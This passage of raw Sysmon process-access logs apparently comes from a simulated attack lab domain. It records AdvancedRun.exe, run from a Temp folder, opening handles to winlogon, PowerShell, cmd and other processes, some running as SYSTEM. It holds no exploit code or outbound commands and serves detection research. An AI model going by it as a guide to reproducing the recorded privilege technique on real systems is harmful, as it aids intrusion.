20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.381{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.380{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004069038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.379{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004069035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:10:18.378{834264DD-12F5-61EB-5008-000000002702}47924984C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C: